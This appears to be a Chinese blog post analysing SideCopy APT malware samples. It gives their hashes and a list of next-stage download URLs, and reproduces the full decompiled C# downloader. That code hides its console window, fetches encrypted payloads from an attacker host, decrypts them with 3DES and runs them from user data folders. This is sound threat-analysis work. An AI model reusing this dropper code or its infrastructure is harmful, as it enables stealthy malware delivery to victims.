Sidecopy样本分析

最新推荐文章于 2023-05-23 13:47:35 发布

拜乔布斯

最新推荐文章于 2023-05-23 13:47:35 发布

阅读量494

点赞数

分类专栏： APT样本实战分析文章标签： APT样本分析

本文链接：https://blog.csdn.net/singleyellow/article/details/121244539

版权

APT样本实战分析专栏收录该内容

5 篇文章 0 订阅

订阅专栏

本文分析了源自特定来源的两个APT样本，其MD5和SHA256值分别为：1817cd95e422a9094d91c6d61c2ba8cc, d78e8943a1a2932d094957ef47956324 和 ac80eb10f16f3da1651b8fcb7dbc714255f4ec9719e922baeeb3499d9bd89e23, 3fbbbb3ba6f63bf7d789cb845a33dcc457f0dcd73c45e53622dbd2c54fb5ca0e。这些C#编写的恶意软件在ApplicationData和CommonApplicationData目录下载并执行解密后的恶意内容。样本下载链接包括多个TinyURL短链。" 118794684,10293548,Linux中Python 3.4虚拟环境创建错误及解决方案,"['Python开发', 'Linux系统', '虚拟环境管理', '文件权限', '错误排查']

摘要由CSDN通过智能技术生成

样本来源

如下图

样本MD5：

1817cd95e422a9094d91c6d61c2ba8cc

d78e8943a1a2932d094957ef47956324

对应SHA256：

ac80eb10f16f3da1651b8fcb7dbc714255f4ec9719e922baeeb3499d9bd89e23

3fbbbb3ba6f63bf7d789cb845a33dcc457f0dcd73c45e53622dbd2c54fb5ca0e

下一轮样本下载地址：

http[:]//www.mojochamps.com/xim/m/p.php

http[:]//www.mojochamps.com/xim/m/sc.php

http[:]//www.mojochamps.com/xim/m/o.php

https[:]//tinyurl.com/pismal

https[:]//tinyurl.com/scoscsc

https[:]//tinyurl.com/oooooooo0

样本分析

在互联网只发现了其中的2个样本，均为C#语言编写，且代码流程比较简单。在ApplicationData、CommonApplicationData目录下载恶意内容，解密后运行，代码具体如下：

namespace Smixblix
{
	internal class Tkmxk
	{
		[DllImport("user32.dll")]
		private static extern int ShowWindow(int Handle, int showState);

		[DllImport("kernel32.dll")]
		public static extern int GetConsoleWindow();

		private static void Main(string[] args)
		{
			int consoleWindow = Tkmxk.GetConsoleWindow();
			Tkmxk.ShowWindow(consoleWindow, 0);
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
			string text = "p";
			string text2 = "x";
			string text3 = "e";
			string text4 = "n";
			string text5 = "g";
			string text6 = ".";
			string text7 = "v";
			string text8 = "b";
			string text9 = "s";
			string text10 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\taswala.txt";
            string text11 = string.Concat(new string[]
			{
				Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
				"\\scanned-img",
				text6,
				text,
				text4,
				text5
			});
            string text12 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\khat.txt";
            string text13 = string.Concat(new string[]
			{
				Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
				"\\p",
				text6,
				text7,
				text8,
				text9
			});
            string text14 = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\BBMN.txt";
            string text15 = string.Concat(new string[]
			{
				Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData),
				"\\siemence",
				text6,
				text3,
				text2,
				text3
			});
			bool flag = !File.Exists(text10);
			if (flag)
			{
				WebClient webClient = new WebClient();
				webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/p.php"), text10);
				Thread.Sleep(1000);
				string c = File.ReadAllText(text10);
				string s = Tkmxk.springs(c);
				byte[] bytes = Convert.FromBase64String(s);
				Thread.Sleep(1000);
				File.WriteAllBytes(text11, bytes);
				Process.Start(text11);
				Thread.Sleep(15000);
				webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/sc.php"), text12);
				Thread.Sleep(1000);
				string c2 = File.ReadAllText(text12);
				string s2 = Tkmxk.springs(c2);
				byte[] bytes2 = Convert.FromBase64String(s2);
				File.WriteAllBytes(text13, bytes2);
				Thread.Sleep(15000);
				Process.Start(text13);
				webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/o.php"), text14);
				Thread.Sleep(15000);
				string c3 = File.ReadAllText(text14);
				string s3 = Tkmxk.springs(c3);
				byte[] bytes3 = Convert.FromBase64String(s3);
				File.WriteAllBytes(text15, bytes3);
				Thread.Sleep(26000);
				Process.Start(text15);
			}
			else
			{
				Process.Start(text11);
			}
		}
		public static string springs(string C)
		{
			byte[] array = Convert.FromBase64String(C);
			MD5CryptoServiceProvider md5CryptoServiceProvider = new MD5CryptoServiceProvider();
			byte[] key = md5CryptoServiceProvider.ComputeHash(Encoding.UTF8.GetBytes("new Stream()"));
			md5CryptoServiceProvider.Clear();
			TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
			tripleDESCryptoServiceProvider.Key = key;
			tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
			tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
			ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor();
			byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
			tripleDESCryptoServiceProvider.Clear();
			return Encoding.UTF8.GetString(bytes);
		}
		private const string classes = "new Stream()";
	}
}